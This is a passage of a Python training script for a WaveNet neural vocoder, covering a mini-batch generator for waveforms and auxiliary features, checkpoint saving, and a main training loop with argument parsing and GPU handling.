    layer.  Tensors are moved to CUDA when available.

    Args:
        wav_list (list): List of wav files.
        feat_list (list): List of feat files.
        receptive_field (int): Size of receptive filed.
        batch_length (int): Batch length (if set None, utterance batch will be used.).
        batch_size (int): Batch size (if batch_length = None, batch_size will be 1.).
        feature_type (str): Auxiliary feature type.
        wav_transform (func): Preprocessing function for waveform.
        feat_transform (func): Preprocessing function for aux feats.
        shuffle (bool): Whether to shuffle the file list.
        upsampling_factor (int): Upsampling factor.
        use_upsampling_layer (bool): Whether to use upsampling layer.
        use_speaker_code (bool): Whether to use speaker code.

    Returns:
        generator: Generator instance.
    """
    # shuffle list
    if shuffle:
        n_files = len(wav_list)
        idx = np.random.permutation(n_files)
        wav_list = [wav_list[i] for i in idx]
        feat_list = [feat_list[i] for i in idx]

    # check batch_length: with the upsampling layer, receptive_field +
    # batch_length must be a multiple of upsampling_factor, so shrink it.
    if batch_length is not None and use_upsampling_layer:
        batch_mod = (receptive_field + batch_length) % upsampling_factor
        logging.warning("batch length is decreased due to upsampling (%d -> %d)" % (
            batch_length, batch_length - batch_mod))
        batch_length -= batch_mod

    # show warning
    if batch_length is None and batch_size > 1:
        logging.warning("in utterance batch mode, batchsize will be 1.")

    while True:
        batch_x, batch_h, batch_t = [], [], []
        # process over all of files
        for wavfile, featfile in zip(wav_list, feat_list):
            # load waveform and aux feature
            # NOTE(review): `fs` (presumably the sampling rate) is never used.
            x, fs = sf.read(wavfile, dtype=np.float32)
            h = read_hdf5(featfile, "/" + feature_type)
            if not use_upsampling_layer:
                # Repeat each feature frame so h matches the sample rate of x.
                h = extend_time(h, upsampling_factor)
            if use_speaker_code:
                sc = read_hdf5(featfile, "/speaker_code")
                sc = np.tile(sc, [h.shape[0], 1])
                h = np.concatenate([h, sc], axis=1)

            # check both lengths are same
            logging.debug("before x length = %d" % x.shape[0])
            logging.debug("before h length = %d" % h.shape[0])
            if use_upsampling_layer:
                x, h = validate_length(x, h, upsampling_factor)
            else:
                x, h = validate_length(x, h)
            logging.debug("after x length = %d" % x.shape[0])
            logging.debug("after h length = %d" % h.shape[0])

            # ---------------------------------------
            # use mini batch without upsampling layer
            # ---------------------------------------
            if batch_length is not None and not use_upsampling_layer:
                # make buffer array: the locals() check creates the buffers on
                # first use; they persist across files (and epochs) for the
                # lifetime of the generator, carrying leftover samples over.
                if "x_buffer" not in locals():
                    x_buffer = np.empty((0), dtype=np.float32)
                    h_buffer = np.empty((0, h.shape[1]), dtype=np.float32)
                x_buffer = np.concatenate([x_buffer, x], axis=0)
                h_buffer = np.concatenate([h_buffer, h], axis=0)

                while len(x_buffer) > receptive_field + batch_length:
                    # get pieces
                    x_ = x_buffer[:receptive_field + batch_length]
                    h_ = h_buffer[:receptive_field + batch_length]

                    # perform pre-processing
                    if wav_transform is not None:
                        x_ = wav_transform(x_)
                    if feat_transform is not None:
                        h_ = feat_transform(h_)

                    # convert to torch variable
                    x_ = torch.from_numpy(x_).long()
                    h_ = torch.from_numpy(h_).float()

                    # remove the last and first sample for training
                    # (input is x[t], target is x[t+1])
                    batch_x += [x_[:-1]]  # (T)
                    batch_h += [h_[:-1].transpose(0, 1)]  # (D x T)
                    batch_t += [x_[1:]]  # (T)

                    # update buffer: shift by batch_length so consecutive
                    # windows overlap by receptive_field samples.
                    x_buffer = x_buffer[batch_length:]
                    h_buffer = h_buffer[batch_length:]

                    # return mini batch
                    if len(batch_x) == batch_size:
                        batch_x = torch.stack(batch_x)
                        batch_h = torch.stack(batch_h)
                        batch_t = torch.stack(batch_t)

                        # send to cuda
                        if torch.cuda.is_available():
                            batch_x = batch_x.cuda()
                            batch_h = batch_h.cuda()
                            batch_t = batch_t.cuda()

                        yield (batch_x, batch_h), batch_t

                        batch_x, batch_h, batch_t = [], [], []

            # ------------------------------------
            # use mini batch with upsampling layer
            # ------------------------------------
            elif batch_length is not None and use_upsampling_layer:
                # make buffer array (see note in the branch above)
                if "x_buffer" not in locals():
                    x_buffer = np.empty((0), dtype=np.float32)
                    h_buffer = np.empty((0, h.shape[1]), dtype=np.float32)
                x_buffer = np.concatenate([x_buffer, x], axis=0)
                h_buffer = np.concatenate([h_buffer, h], axis=0)

                while len(h_buffer) > (receptive_field + batch_length) // upsampling_factor:
                    # set batch size: h is at frame rate, x at sample rate
                    # (+1 extra sample to form the shifted target below)
                    h_bs = (receptive_field + batch_length) // upsampling_factor
                    x_bs = h_bs * upsampling_factor + 1

                    # get pieces
                    h_ = h_buffer[:h_bs]
                    x_ = x_buffer[:x_bs]

                    # perform pre-processing
                    if wav_transform is not None:
                        x_ = wav_transform(x_)
                    if feat_transform is not None:
                        h_ = feat_transform(h_)

                    # convert to torch variable
                    x_ = torch.from_numpy(x_).long()
                    h_ = torch.from_numpy(h_).float()

                    # remove the last and first sample for training
                    batch_h += [h_.transpose(0, 1)]  # (D x T)
                    batch_x += [x_[:-1]]  # (T)
                    batch_t += [x_[1:]]  # (T)

                    # set shift size
                    h_ss = batch_length // upsampling_factor
                    x_ss = h_ss * upsampling_factor

                    # update buffer
                    h_buffer = h_buffer[h_ss:]
                    x_buffer = x_buffer[x_ss:]

                    # return mini batch
                    if len(batch_x) == batch_size:
                        batch_x = torch.stack(batch_x)
                        batch_h = torch.stack(batch_h)
                        batch_t = torch.stack(batch_t)

                        # send to cuda
                        if torch.cuda.is_available():
                            batch_x = batch_x.cuda()
                            batch_h = batch_h.cuda()
                            batch_t = batch_t.cuda()

                        yield (batch_x, batch_h), batch_t

                        batch_x, batch_h, batch_t = [], [], []

            # --------------------------------------------
            # use utterance batch without upsampling layer
            # --------------------------------------------
            elif batch_length is None and not use_upsampling_layer:
                # perform pre-processing
                if wav_transform is not None:
                    x = wav_transform(x)
                if feat_transform is not None:
                    h = feat_transform(h)

                # convert to torch variable
                x = torch.from_numpy(x).long()
                h = torch.from_numpy(h).float()

                # remove the last and first sample for training
                batch_x = x[:-1].unsqueeze(0)  # (1 x T)
                batch_h = h[:-1].transpose(0, 1).unsqueeze(0)  # (1 x D x T)
                batch_t = x[1:].unsqueeze(0)  # (1 x T)

                # send to cuda
                if torch.cuda.is_available():
                    batch_x = batch_x.cuda()
                    batch_h = batch_h.cuda()
                    batch_t = batch_t.cuda()

                yield (batch_x, batch_h), batch_t

            # -----------------------------------------
            # use utterance batch with upsampling layer
            # -----------------------------------------
            else:
                # remove last frame so the shifted target stays in range
                h = h[:-1]
                x = x[:-upsampling_factor + 1]

                # perform pre-processing
                if wav_transform is not None:
                    x = wav_transform(x)
                if feat_transform is not None:
                    h = feat_transform(h)

                # convert to torch variable
                x = torch.from_numpy(x).long()
                h = torch.from_numpy(h).float()

                # remove the last and first sample for training
                batch_h = h.transpose(0, 1).unsqueeze(0)  # (1 x D x T')
                batch_x = x[:-1].unsqueeze(0)  # (1 x T)
                batch_t = x[1:].unsqueeze(0)  # (1 x T)

                # send to cuda
                if torch.cuda.is_available():
                    batch_x = batch_x.cuda()
                    batch_h = batch_h.cuda()
                    batch_t = batch_t.cuda()

                yield (batch_x, batch_h), batch_t

        # re-shuffle before the next pass over the dataset
        if shuffle:
            idx = np.random.permutation(n_files)
            wav_list = [wav_list[i] for i in idx]
            feat_list = [feat_list[i] for i in idx]
def save_checkpoint(checkpoint_dir, model, optimizer, iterations):
    """SAVE CHECKPOINT.

    Serializes model + optimizer state and the iteration counter to
    ``<checkpoint_dir>/checkpoint-<iterations>.pkl``, creating the
    directory if needed.

    Args:
        checkpoint_dir (str): Directory to save checkpoint.
        model (torch.nn.Module): Pytorch model instance.
        optimizer (torch.optim.optimizer): Pytorch optimizer instance.
        iterations (int): Number of current iterations.
    """
    checkpoint = {
        "model": model.state_dict(),
        "optimizer": optimizer.state_dict(),
        "iterations": iterations}
    # exist_ok avoids the race between the existence check and creation
    # that the original exists()/makedirs() pair had.
    os.makedirs(checkpoint_dir, exist_ok=True)
    path = os.path.join(checkpoint_dir, "checkpoint-%d.pkl" % iterations)
    torch.save(checkpoint, path)
    logging.info("%d-iter checkpoint created.", iterations)
def main():
    """RUN TRAINING.

    Parses CLI arguments, builds the WaveNet model, data generator,
    optimizer and loss, optionally resumes from a checkpoint, then runs
    the training loop on GPU, checkpointing periodically.
    """
    parser = argparse.ArgumentParser()
    # path setting
    parser.add_argument("--waveforms", required=True,
                        type=str, help="directory or list of wav files")
    parser.add_argument("--feats", required=True,
                        type=str, help="directory or list of aux feat files")
    parser.add_argument("--stats", required=True,
                        type=str, help="hdf5 file including statistics")
    parser.add_argument("--expdir", required=True,
                        type=str, help="directory to save the model")
    parser.add_argument("--feature_type", default="world", choices=["world", "melspc"],
                        type=str, help="feature type")
    # network structure setting
    parser.add_argument("--n_quantize", default=256,
                        type=int, help="number of quantization")
    parser.add_argument("--n_aux", default=28,
                        type=int, help="number of dimension of aux feats")
    parser.add_argument("--n_resch", default=512,
                        type=int, help="number of channels of residual output")
    parser.add_argument("--n_skipch", default=256,
                        type=int, help="number of channels of skip output")
    parser.add_argument("--dilation_depth", default=10,
                        type=int, help="depth of dilation")
    parser.add_argument("--dilation_repeat", default=1,
                        type=int, help="number of repeating of dilation")
    parser.add_argument("--kernel_size", default=2,
                        type=int, help="kernel size of dilated causal convolution")
    parser.add_argument("--upsampling_factor", default=80,
                        type=int, help="upsampling factor of aux features")
    parser.add_argument("--use_upsampling_layer", default=True,
                        type=strtobool, help="flag to use upsampling layer")
    parser.add_argument("--use_speaker_code", default=False,
                        type=strtobool, help="flag to use speaker code")
    # network training setting
    parser.add_argument("--lr", default=1e-4,
                        type=float, help="learning rate")
    parser.add_argument("--weight_decay", default=0.0,
                        type=float, help="weight decay coefficient")
    parser.add_argument("--batch_length", default=20000,
                        type=int, help="batch length (if set 0, utterance batch will be used)")
    parser.add_argument("--batch_size", default=1,
                        type=int, help="batch size (if use utterance batch, batch_size will be 1.")
    parser.add_argument("--iters", default=200000,
                        type=int, help="number of iterations")
    # other setting
    parser.add_argument("--checkpoint_interval", default=10000,
                        type=int, help="how frequent saving model")
    parser.add_argument("--intervals", default=100,
                        type=int, help="log interval")
    parser.add_argument("--seed", default=1,
                        type=int, help="seed number")
    parser.add_argument("--resume", default=None, nargs="?",
                        type=str, help="model path to restart training")
    parser.add_argument("--n_gpus", default=1,
                        type=int, help="number of gpus")
    parser.add_argument("--verbose", default=1,
                        type=int, help="log level")
    args = parser.parse_args()

    # set log level (1 = INFO, >1 = DEBUG, otherwise WARNING only)
    if args.verbose == 1:
        logging.basicConfig(level=logging.INFO,
                            format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
                            datefmt='%m/%d/%Y %I:%M:%S')
    elif args.verbose > 1:
        logging.basicConfig(level=logging.DEBUG,
                            format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
                            datefmt='%m/%d/%Y %I:%M:%S')
    else:
        logging.basicConfig(level=logging.WARNING,
                            format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
                            datefmt='%m/%d/%Y %I:%M:%S')
        logging.warning("logging is disabled.")

    # show arguments
    for key, value in vars(args).items():
        logging.info("%s = %s" % (key, str(value)))

    # make experimental directory
    if not os.path.exists(args.expdir):
        os.makedirs(args.expdir)

    # fix seed
    os.environ['PYTHONHASHSEED'] = str(args.seed)
    np.random.seed(args.seed)
    torch.manual_seed(args.seed)

    # fix slow computation of dilated conv
    # https://github.com/pytorch/pytorch/issues/15054#issuecomment-450191923
    torch.backends.cudnn.benchmark = True

    # save args as conf
    torch.save(args, args.expdir + "/model.conf")

    # define network (upsampling_factor == 0 disables the upsampling layer)
    if args.use_upsampling_layer:
        upsampling_factor = args.upsampling_factor
    else:
        upsampling_factor = 0
    model = WaveNet(
        n_quantize=args.n_quantize,
        n_aux=args.n_aux,
        n_resch=args.n_resch,
        n_skipch=args.n_skipch,
        dilation_depth=args.dilation_depth,
        dilation_repeat=args.dilation_repeat,
        kernel_size=args.kernel_size,
        upsampling_factor=upsampling_factor)
    logging.info(model)
    model.apply(initialize)
    model.train()

    if args.n_gpus > 1:
        device_ids = range(args.n_gpus)
        model = torch.nn.DataParallel(model, device_ids)
        # expose the wrapped model's receptive_field on the DataParallel shell
        model.receptive_field = model.module.receptive_field
        if args.n_gpus > args.batch_size:
            logging.warning("batch size is less than number of gpus.")

    # define optimizer and loss
    optimizer = torch.optim.Adam(
        model.parameters(),
        lr=args.lr,
        weight_decay=args.weight_decay)
    criterion = nn.CrossEntropyLoss()

    # define transforms: mu-law encode waveforms, standardize aux feats
    # using precomputed statistics.
    scaler = StandardScaler()
    scaler.mean_ = read_hdf5(args.stats, "/" + args.feature_type + "/mean")
    scaler.scale_ = read_hdf5(args.stats, "/" + args.feature_type + "/scale")
    wav_transform = transforms.Compose([
        lambda x: encode_mu_law(x, args.n_quantize)])
    feat_transform = transforms.Compose([
        lambda x: scaler.transform(x)])

    # define generator: --waveforms may be a directory of wavs or a text
    # file listing paths (same for --feats).
    if os.path.isdir(args.waveforms):
        filenames = sorted(find_files(args.waveforms, "*.wav", use_dir_name=False))
        wav_list = [args.waveforms + "/" + filename for filename in filenames]
        feat_list = [args.feats + "/" + filename.replace(".wav", ".h5") for filename in filenames]
    elif os.path.isfile(args.waveforms):
        wav_list = read_txt(args.waveforms)
        feat_list = read_txt(args.feats)
    else:
        logging.error("--waveforms should be directory or list.")
        sys.exit(1)
    assert len(wav_list) == len(feat_list)
    logging.info("number of training data = %d." % len(wav_list))
    generator = train_generator(
        wav_list, feat_list,
        receptive_field=model.receptive_field,
        batch_length=args.batch_length,
        batch_size=args.batch_size,
        feature_type=args.feature_type,
        wav_transform=wav_transform,
        feat_transform=feat_transform,
        shuffle=True,
        upsampling_factor=args.upsampling_factor,
        use_upsampling_layer=args.use_upsampling_layer,
        use_speaker_code=args.use_speaker_code)

    # charge minibatch in queue (the @background wrapper prefetches)
    while not generator.queue.full():
        time.sleep(0.1)

    # resume model and optimizer
    if args.resume is not None and len(args.resume) != 0:
        checkpoint = torch.load(args.resume, map_location=lambda storage, loc: storage)
        iterations = checkpoint["iterations"]
        if args.n_gpus > 1:
            model.module.load_state_dict(checkpoint["model"])
        else:
            model.load_state_dict(checkpoint["model"])
        optimizer.load_state_dict(checkpoint["optimizer"])
        logging.info("restored from %d-iter checkpoint." % iterations)
    else:
        iterations = 0

    # check gpu and then send to gpu (optimizer state tensors must be
    # moved manually after a CPU-side resume)
    if torch.cuda.is_available():
        model.cuda()
        criterion.cuda()
        for state in optimizer.state.values():
            for key, value in state.items():
                if torch.is_tensor(value):
                    state[key] = value.cuda()
    else:
        logging.error("gpu is not available. please check the setting.")
        sys.exit(1)

    # train
    loss = 0
    total = 0
    for i in six.moves.range(iterations, args.iters):
        start = time.time()
        # NOTE(review): relies on the @background wrapper exposing a
        # Python-2-style .next() method — confirm against utils.background.
        (batch_x, batch_h), batch_t = generator.next()
        batch_output = model(batch_x, batch_h)
        # drop the receptive-field prefix: those outputs lack full context
        batch_loss = criterion(
            batch_output[:, model.receptive_field:].contiguous().view(-1, args.n_quantize),
            batch_t[:, model.receptive_field:].contiguous().view(-1))
        optimizer.zero_grad()
        batch_loss.backward()
        optimizer.step()
        loss += batch_loss.item()
        total += time.time() - start
        logging.debug("batch loss = %.3f (%.3f sec / batch)" % (
            batch_loss.item(), time.time() - start))

        # report progress
        if (i + 1) % args.intervals == 0:
            logging.info("(iter:%d) average loss = %.6f (%.3f sec / batch)" % (
                i + 1, loss / args.intervals, total / args.intervals))
            logging.info("estimated required time = "
                         "{0.days:02}:{0.hours:02}:{0.minutes:02}:{0.seconds:02}"
                         .format(relativedelta(
                             seconds=int((args.iters - (i + 1)) * (total / args.intervals)))))
            loss = 0
            total = 0

        # save intermidiate model
        if (i + 1) % args.checkpoint_interval == 0:
            if args.n_gpus > 1:
                save_checkpoint(args.expdir, model.module, optimizer, i + 1)
            else:
                save_checkpoint(args.expdir, model, optimizer, i + 1)

    # save final model
    if args.n_gpus > 1:
        torch.save({"model": model.module.state_dict()}, args.expdir + "/checkpoint-final.pkl")
    else:
        torch.save({"model": model.state_dict()}, args.expdir + "/checkpoint-final.pkl")
    logging.info("final checkpoint created.")
if __name__ == "__main__":
    # Script entry point: run training with CLI arguments.
    main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.